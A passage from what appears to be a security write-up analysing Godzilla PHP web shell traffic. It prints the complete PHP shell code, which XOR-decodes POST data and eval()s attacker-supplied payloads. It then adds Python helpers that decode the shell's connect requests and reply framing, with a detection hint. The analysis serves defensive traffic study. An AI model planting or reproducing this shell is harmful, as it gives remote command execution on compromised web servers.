    """Undo the strrev() step: the request carries the base64 reversed."""
    return s[::-1]


original_string = "string"
reversed_string = reverse_string(original_string)
print(reversed_string)  # prints the reversed string
```

Base64-decoding the reversed string (screenshot in the original) gives the PHP shell payload:

```php
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';              // POST parameter name / password; the generator's default, a real shell embeds whatever was configured
$payloadName='payload';
$key='3c6e0b8a9c15224a';   // md5("key")[0:16], the generator's default key
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}
```
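The connect-request decoding chain (URL-decode, reverse, base64-decode) and the reply layout the shell above produces (`md5($pass.$key)[0:16]` + base64 of the XOR-encoded result + `md5($pass.$key)[16:]`), as one added Python example that is not code from the original post or from Godzilla. The traffic, the password "pass" and the key "3c6e0b8a9c15224a" below are constructed for the demonstration.

```python
"""Godzilla (哥斯拉) PHP_XOR_BASE64 helpers: decode the connect request and
frame or unframe replies the way the shell above does.

Added example, not from the original post or from Godzilla. The decode chain
(URL-decode -> reverse -> base64-decode) and the reply layout
md5($pass.$key)[0:16] + base64(encode(result)) + md5($pass.$key)[16:] come from
the text and shell above; password, key and traffic below are constructed.
"""
import base64
import hashlib
from urllib.parse import quote, unquote_plus

PASSWORD = "pass"          # POST parameter name / password (constructed)
KEY = b"3c6e0b8a9c15224a"  # 16-byte XOR key (constructed)


def godzilla_xor(data, key):
    """encode($D,$K) from the shell: $D[$i] ^ $K[$i+1&15]; symmetric."""
    return bytes(b ^ key[(i + 1) & 15] for i, b in enumerate(data))


def decode_connect_request(param_value):
    """URL-decode, reverse the string, base64-decode: recovers the PHP sent on connect."""
    return base64.b64decode(unquote_plus(param_value)[::-1]).decode()


def encode_connect_request(php):
    """Inverse chain, used here only to build a sample request."""
    return quote(base64.b64encode(php.encode()).decode()[::-1], safe="")


def looks_reversed_base64(param_value):
    """Reversed base64 carries its '=' padding at the front ('%3D%3D...' once URL-encoded)."""
    return unquote_plus(param_value).startswith("=")


def reply_frame(password, key):
    """The two md5 halves that bracket every reply."""
    h = hashlib.md5(password.encode() + key).hexdigest()
    return h[:16], h[16:]


def frame_reply(result, password, key):
    """What the shell echoes: prefix + base64(encode(result)) + suffix."""
    prefix, suffix = reply_frame(password, key)
    return prefix + base64.b64encode(godzilla_xor(result, key)).decode() + suffix


def unframe_reply(body, password, key):
    """Check the md5 halves, then undo base64 and XOR; None if the frame does not match."""
    prefix, suffix = reply_frame(password, key)
    if len(body) < 32 or not (body.startswith(prefix) and body.endswith(suffix)):
        return None
    return godzilla_xor(base64.b64decode(body[16:-16]), key)


# constructed connect request and reply (not captured traffic)
SAMPLE_PHP = "@session_start();@set_time_limit(0);@error_reporting(0);"
SAMPLE_REQUEST = PASSWORD + "=" + encode_connect_request(SAMPLE_PHP)
SAMPLE_REPLY = frame_reply(b"getBasicsInfo: www-data", PASSWORD, KEY)

if __name__ == "__main__":
    print(decode_connect_request(SAMPLE_REQUEST.split("=", 1)[1]))
    print(unframe_reply(SAMPLE_REPLY, PASSWORD, KEY))
```

Because the 32 hex characters around the reply are `md5($pass.$key)`, the same prefix and suffix repeat in every response from one shell; once a password and key are known, `unframe_reply` returning `None` for a candidate pair is a quick way to tell that the shell was generated with different settings.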

For the analysis of the server-side shell, see the article by the author I learned this from.


